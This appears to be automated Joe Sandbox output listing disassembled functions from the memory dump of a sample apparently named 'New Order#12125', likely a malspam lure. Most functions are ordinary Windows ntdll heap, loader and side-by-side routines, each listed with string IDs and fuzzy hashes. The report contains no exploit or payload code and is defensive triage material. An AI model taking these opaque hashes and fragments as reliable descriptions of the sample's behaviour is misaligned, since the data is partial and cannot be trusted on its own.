                                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                        • API String ID: 0-4009184096
                                                                        • Opcode ID: 9fb4ba076338c803207f8b7491befdef86e684955487188b33196921f2c19e8d
                                                                        • Instruction ID: 8dc255e018b73cb9a489d354d78d4d881028f69aee24a58b9116becd79dcf917
                                                                        • Opcode Fuzzy Hash: 9fb4ba076338c803207f8b7491befdef86e684955487188b33196921f2c19e8d
                                                                        • Instruction Fuzzy Hash: C10260F1D00629AFDB21DB54DC81B9DB7B8BF94314F4045DAA609AB241EB309F84CF69
                                                                        Function 01530F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                        • API String ID: 0-360209818
                                                                        • Opcode ID: 720b02705db1051bd30fe752f34a468aee0772c79626319623c64830cf4a63d4
                                                                        • Instruction ID: aee5849904340250054ee1095ee635a92b489a4b4b0c105485d27118988f6cc6
                                                                        • Opcode Fuzzy Hash: 720b02705db1051bd30fe752f34a468aee0772c79626319623c64830cf4a63d4
                                                                        • Instruction Fuzzy Hash: 4F629EB1A006298FDB24CF19D8827ADBBB6BFD5310F5482DAD549AF240D7325AE1CF50
                                                                        Function 015A8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                        • API String ID: 0-2515994595
                                                                        • Opcode ID: d8e35c8027d3813c532b201a36160d8799eed86a296d50f846471db2de93e0e5
                                                                        • Instruction ID: 23d12a002d204485f1231d2b16ede017f0688bb2583fd4de6101162a7e18cfaf
                                                                        • Opcode Fuzzy Hash: d8e35c8027d3813c532b201a36160d8799eed86a296d50f846471db2de93e0e5
                                                                        • Instruction Fuzzy Hash: CE51E0711443129BD725DF18C854BAFBBE8FF94245F94491EB958CB250E770D604CBD2
                                                                        Function 015B12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                        • API String ID: 0-3591852110
                                                                        • Opcode ID: 76201acc89686c2df86749c2a936ca54120e189f93aef4b5f502db82e6abb72b
                                                                        • Instruction ID: 6d7453e8c71ce0b7e0a74c28e8f21dccd48fa05f408a040313e193a9eb4ef6b3
                                                                        • Opcode Fuzzy Hash: 76201acc89686c2df86749c2a936ca54120e189f93aef4b5f502db82e6abb72b
                                                                        • Instruction Fuzzy Hash: E6128B30600A42DFDB658F29D4E5BBABBF1FF19614F18885EE5868F691D734E880CB50
                                                                        Function 0151AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                        • API String ID: 0-3197712848
                                                                        • Opcode ID: ba8f7daa57a8874226572cabaaec2f72d580fed8a6d162ef0d6dd1d34f4c3dd6
                                                                        • Instruction ID: 3bd7f7f63fe2307d9fd65cc61937925272369acb2ced526c8b2a5c798861bdd6
                                                                        • Opcode Fuzzy Hash: ba8f7daa57a8874226572cabaaec2f72d580fed8a6d162ef0d6dd1d34f4c3dd6
                                                                        • Instruction Fuzzy Hash: AB12F0716093828FE326DF28C880BAAB7E4FF84714F05491EF9958F295E774D944CB92
                                                                        Function 014FD34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                        • API String ID: 0-3532704233
                                                                        • Opcode ID: a4f7c37213c2ac0978c6d024bffafff3a0c19a66a8fa56fcb9e0f11604491afe
                                                                        • Instruction ID: c392cb1f113d2a007d2637a31abd8b6f1484553d1ca6e7d2ac36f557f585a238
                                                                        • Opcode Fuzzy Hash: a4f7c37213c2ac0978c6d024bffafff3a0c19a66a8fa56fcb9e0f11604491afe
                                                                        • Instruction Fuzzy Hash: 6DB18C729083529FD711DF68C490A6FBBE8BB88754F05492FFA89DB320D730D9058B92
                                                                        Function 015B0CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                        • API String ID: 0-1357697941
                                                                        • Opcode ID: f420bb705d61e01e3f5620158f4fd90be25f91a9f2626caadbe68a6078b9ed91
                                                                        • Instruction ID: e40952e83463853036842c42589e6ee111b2795e4bc3200c29373359b5d1b53f
                                                                        • Opcode Fuzzy Hash: f420bb705d61e01e3f5620158f4fd90be25f91a9f2626caadbe68a6078b9ed91
                                                                        • Instruction Fuzzy Hash: D0F1BC31A00A86EFDB25CF69C0D0BEABBF5FF19704F18845EE6859B291C730A945CB50
                                                                        Function 015B0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                        • API String ID: 0-1700792311
                                                                        • Opcode ID: 3655efa1731eb22421dc53349bbefecdf8f84353cf756584573b64f44af82c15
                                                                        • Instruction ID: 61c3df4d84246ebc0fd50b72853e045421c8fd8df76cc09efebc49c32c1cf0b7
                                                                        • Opcode Fuzzy Hash: 3655efa1731eb22421dc53349bbefecdf8f84353cf756584573b64f44af82c15
                                                                        • Instruction Fuzzy Hash: BED1CB31500686DFDB22DF69C490AEEBBF1FF5A600F18805EE9459F6A2C7349985CB10
                                                                        Function 015889B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • VerifierDebug, xrefs: 01588CA5
                                                                        • VerifierDlls, xrefs: 01588CBD
                                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01588A67
                                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01588A3D
                                                                        • HandleTraces, xrefs: 01588C8F
                                                                        • VerifierFlags, xrefs: 01588C50
                                                                        • AVRF: -*- final list of providers -*- , xrefs: 01588B8F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                        • API String ID: 0-3223716464
                                                                        • Opcode ID: 46f5aee71586dc31585ddca6110dfc5a50155c44c411d21615aa427f9bd4e3bd
                                                                        • Instruction ID: 84f7f71f89395dd8fdb39f3eb4f4b9ce7783dfbd28e977e3cb5d125bbae6bcf4
                                                                        • Opcode Fuzzy Hash: 46f5aee71586dc31585ddca6110dfc5a50155c44c411d21615aa427f9bd4e3bd
                                                                        • Instruction Fuzzy Hash: 18911371641702AFD722FF68C880B2A7BE4FB94714F86095DFA40BF291D770A805CBA1
                                                                        Function 0150EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                        • API String ID: 0-1109411897
                                                                        • Opcode ID: 3e5d50b9d80dbb6f024e6276a57fc8259006773873d19ed748d863413b99b51d
                                                                        • Instruction ID: 005aee9baed47bbd310e7ff442939c8f52c1800b82a037ecc82da0039b50f0c1
                                                                        • Opcode Fuzzy Hash: 3e5d50b9d80dbb6f024e6276a57fc8259006773873d19ed748d863413b99b51d
                                                                        • Instruction Fuzzy Hash: E4A23974A0562A8FDB75CF58C9887ADBBB5BF45304F2446EAD509AB290DB309EC1CF40
                                                                        Function 014FF172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-523794902
                                                                        • Opcode ID: f7b917c2b86171c9748785edd87609854423ac4d49fd93307fb2dd10a117a4dc
                                                                        • Instruction ID: 964e6b07813d8c30f70e8ffca6ce979bfeb15c20a032843e411ef7018cd74bc6
                                                                        • Opcode Fuzzy Hash: f7b917c2b86171c9748785edd87609854423ac4d49fd93307fb2dd10a117a4dc
                                                                        • Instruction Fuzzy Hash: 4E4201362043828FD715CF28C894B6ABBE5FF94604F14496EFA95CB362D730D94ACB52
                                                                        Function 0150ADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                        • API String ID: 0-4098886588
                                                                        • Opcode ID: cb66fcf27792a1150dee14ca7ffe569542897f5368f812c815befc599f804829
                                                                        • Instruction ID: 302e21b79b6da4512a7bedc0b88f5d5636da8c343a49855e6477305366024f0a
                                                                        • Opcode Fuzzy Hash: cb66fcf27792a1150dee14ca7ffe569542897f5368f812c815befc599f804829
                                                                        • Instruction Fuzzy Hash: 1C32A27490426A8BDB23CF58C898BEEBBB9BF44340F1445E9D849AF291D7319E81CF40
                                                                        Function 0151B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                        • API String ID: 0-122214566
                                                                        • Opcode ID: a7acf920a669fff87a946627bf9f57a8e99e5484c3f25aaa2c27f6edbdd5c076
                                                                        • Instruction ID: 9bbe3ca03db6f2d3987f730618df6a9e231220eafc125ac24108e1cc1766270c
                                                                        • Opcode Fuzzy Hash: a7acf920a669fff87a946627bf9f57a8e99e5484c3f25aaa2c27f6edbdd5c076
                                                                        • Instruction Fuzzy Hash: 58C14931A00316ABFB269B68C891BBEBBB5BF85304F148169ED129F299D774CD44C391
                                                                        Function 015363FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-792281065
                                                                        • Opcode ID: 8add9c685cab64a42c6a99e642dda75489cb59d6293359530da28c1991219dcc
                                                                        • Instruction ID: 27800e2b49461279e59a437f1685039fb5eaf628e0217217496d8f89e224a3aa
                                                                        • Opcode Fuzzy Hash: 8add9c685cab64a42c6a99e642dda75489cb59d6293359530da28c1991219dcc
                                                                        • Instruction Fuzzy Hash: CB914B70F01316ABEB35EF58E88ABAE7BE1BF80714F15012DE510AF291D7B09941C791
                                                                        Function 014F645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015599ED
                                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01559A01
                                                                        • apphelp.dll, xrefs: 014F6496
                                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01559A2A
                                                                        • LdrpInitShimEngine, xrefs: 015599F4, 01559A07, 01559A30
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01559A11, 01559A3A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-204845295
                                                                        • Opcode ID: 0aa54e95f8aaafb5f6bcde27bbb6094304beb8e85bd86306e07c2ebd7922d66b
                                                                        • Instruction ID: 4b2bdde7a45512a68fe3be8302ddd6b711a021de2d50b51910fba488a96952e9
                                                                        • Opcode Fuzzy Hash: 0aa54e95f8aaafb5f6bcde27bbb6094304beb8e85bd86306e07c2ebd7922d66b
                                                                        • Instruction Fuzzy Hash: 6C519E71218305DFE721EF24D855FAB77E8FB84648F11091EEA959B260D7B0E904CBA2
                                                                        Function 01532674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015721BF
                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01572180
                                                                        • SXS: %s() passed the empty activation context, xrefs: 01572165
                                                                        • RtlGetAssemblyStorageRoot, xrefs: 01572160, 0157219A, 015721BA
                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0157219F
                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01572178
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                        • API String ID: 0-861424205
                                                                        • Opcode ID: c244b6bcd6fc750bc0c8d2a100b03efa9257079d3da081bcd774785f0d3550ce
                                                                        • Instruction ID: ca6dce90dd1475c541de19ce48337a7a64be992c3ec1b10a914a6d216306406e
                                                                        • Opcode Fuzzy Hash: c244b6bcd6fc750bc0c8d2a100b03efa9257079d3da081bcd774785f0d3550ce
                                                                        • Instruction Fuzzy Hash: EF310936B4021577E7229A99AC46F5E7BB8FFE4AA1F05005ABB04BF150D2709A00C7E0
                                                                        Function 0153C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01578181, 015781F5
                                                                        • LdrpInitializeImportRedirection, xrefs: 01578177, 015781EB
                                                                        • LdrpInitializeProcess, xrefs: 0153C6C4
                                                                        • Loading import redirection DLL: '%wZ', xrefs: 01578170
                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 015781E5
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0153C6C3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                        • API String ID: 0-475462383
                                                                        • Opcode ID: 06508298311ac55e7195ec9c5193b5a9f9ef679efbe7339b7029fced058496b0
                                                                        • Instruction ID: 57554c16196d48988585acae677431462f2d54d684e2dc2ff224753b2cbca778
                                                                        • Opcode Fuzzy Hash: 06508298311ac55e7195ec9c5193b5a9f9ef679efbe7339b7029fced058496b0
                                                                        • Instruction Fuzzy Hash: 0A3104726443139BD214EF28E84AE2A77E4FFD4B14F05095DF940AF2A1DA70ED04C7A2
                                                                        Function 01519950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                        • API String ID: 0-3393094623
                                                                        • Opcode ID: e8cb9dd3a7cb4461d23a739a09ee5a614d609a93e74e8bd0c410f070070a3331
                                                                        • Instruction ID: 754060c09d843a7cb321b1573851e20d45ed6690894ae0611a91f9bccb99cbf4
                                                                        • Opcode Fuzzy Hash: e8cb9dd3a7cb4461d23a739a09ee5a614d609a93e74e8bd0c410f070070a3331
                                                                        • Instruction Fuzzy Hash: 62025D755083828FE722CF28C09476FBBE5BF88718F44491EE9998F254E774D844CB92
                                                                        Function 0154096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 01542DF0: LdrInitializeThunk.NTDLL ref: 01542DFA
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01540BA3
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01540BB6
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01540D60
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01540D74
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 1404860816-0
                                                                        • Opcode ID: f9fa9a1ab4617b56dd6b71d514a6b1f574c8d8162e3f9696162a3dc88ce8257f
                                                                        • Instruction ID: 44e80c05ed852cf6e6ba7535a32fdd83300c80749c2894b42edd4354270d2e52
                                                                        • Opcode Fuzzy Hash: f9fa9a1ab4617b56dd6b71d514a6b1f574c8d8162e3f9696162a3dc88ce8257f
                                                                        • Instruction Fuzzy Hash: 42426B75900716DFDB21CF28C881BEAB7F4BF44318F1445A9EA89DB241E770AA84CF61
                                                                        Function 01584F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                        • API String ID: 0-2518169356
                                                                        • Opcode ID: 22e5f303ebef62d3ed7744a7eedc4272b78ce434c49a383944f945e589ef9799
                                                                        • Instruction ID: 1556843b71e866998f44b0ea26b489fbde6a41a6d04967ddb66df2e741ed6be1
                                                                        • Opcode Fuzzy Hash: 22e5f303ebef62d3ed7744a7eedc4272b78ce434c49a383944f945e589ef9799
                                                                        • Instruction Fuzzy Hash: 8C91AD76A1061ADBCB21DF9CC880AAEBBB1FF88314F594169E951FB350E735D901CB90
                                                                        Function 015170C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                        • API String ID: 0-3178619729
                                                                        • Opcode ID: 5a1e81480659920f017741e6fa9e912e05d8414d4ab367b8684a67c6ee98d1e1
                                                                        • Instruction ID: 0bfa05adc6d87ff6fa6513b643ee8ba5239e6fa6bbc6795cc1a365236decf584
                                                                        • Opcode Fuzzy Hash: 5a1e81480659920f017741e6fa9e912e05d8414d4ab367b8684a67c6ee98d1e1
                                                                        • Instruction Fuzzy Hash: 9B13BC70A006169FEB26CF6CC4807ADBBF1FF48304F1885A9D959AF389D774A945CB90
                                                                        Function 0151A840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 01567D39
                                                                        • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 01567D03
                                                                        • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 01567D56
                                                                        • SsHd, xrefs: 0151A885
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                        • API String ID: 0-2905229100
                                                                        • Opcode ID: 32a9a645dda908e83fd28cbf568ed00574d8139e330538309ceb06bd1c90d5b0
                                                                        • Instruction ID: 440b8dea1433a838e322b898c0249c499dba1c002e78f4db6d7fe613e5abf0c7
                                                                        • Opcode Fuzzy Hash: 32a9a645dda908e83fd28cbf568ed00574d8139e330538309ceb06bd1c90d5b0
                                                                        • Instruction Fuzzy Hash: 4FD1B276A01255DFEB26CF98C8C0AADBBF6FF58314F19405AE905AF349D3719881CB90
                                                                        Function 0150A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
